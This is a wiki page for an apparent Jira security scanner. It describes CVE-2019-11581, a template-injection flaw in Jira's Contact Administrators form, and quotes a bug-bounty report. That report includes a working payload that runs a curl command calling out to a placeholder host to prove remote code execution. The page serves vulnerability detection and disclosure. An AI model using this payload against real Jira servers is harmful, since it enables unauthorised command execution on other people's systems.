CVE‐2019–11581 - carnal0wnage/J-PWN GitHub Wiki

CVE‐2019–11581

Category: [RCE]

module name: check_cve_2019_11581

url: secure/ContactAdministrators!default.jspa

+ [Potential RCE] - CVE-2019-11581 Detected - The contact form is configured and potential vulnerable [MANUAL REVIEW REQUIRED]
  URL: https://JIRASERVER/jira/secure/ContactAdministrators!default.jspa
  Note: Exploitation requires manual steps.
  Note: For this issue to be exploitable at least one of the following conditions must be met:
  1. An SMTP server has been configured in Jira and the Contact Administrators Form is enabled
  2. or an SMTP server has been configured in Jira and an attacker has "JIRA Administrators" access.
  Note:Refer to: https://jira.atlassian.com/browse/JRASERVER-69532 && https://hackerone.com/reports/706841

[CG] What a true positive may look like:

2019-11581 configured contact form

Description

There was a server-side template injection vulnerability in Jira Server and Data Center, in the ContactAdministrators and the SendBulkMail actions. For this issue to be exploitable at least one of the following conditions must be met:

  • an SMTP server has been configured in Jira and the Contact Administrators Form is enabled; or
  • an SMTP server has been configured in Jira and an attacker has "JIRA Administrators" access.

In the first case, where the Contact Administrators Form is enabled, attackers are able to exploit this issue without authentication. In the second case, attackers with "JIRA Administrators" access can exploit this issue. In either case, successful exploitation of this issue allows an attacker to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center.

Affected versions:

All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.

ref: https://jira.atlassian.com/browse/JRASERVER-69532

from https://hackerone.com/reports/706841

Summary

i found the domain my-com.atlassian.net is vulnerable with RCE Jira(CVE-2019–11581) via contact admin function

POC

  • on page https://my-com.atlassian.net/secure/ContactAdministrators!default.jspa
  • use payload on Subject & Request details
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://your_server_here/rcetest?a=a').waitFor()

Then I immediately received a bunch of curl callbacks on my host from 185.6.245.156, which confirmed the vulnerability.

Impact

Command Injection and RCE

Other refs: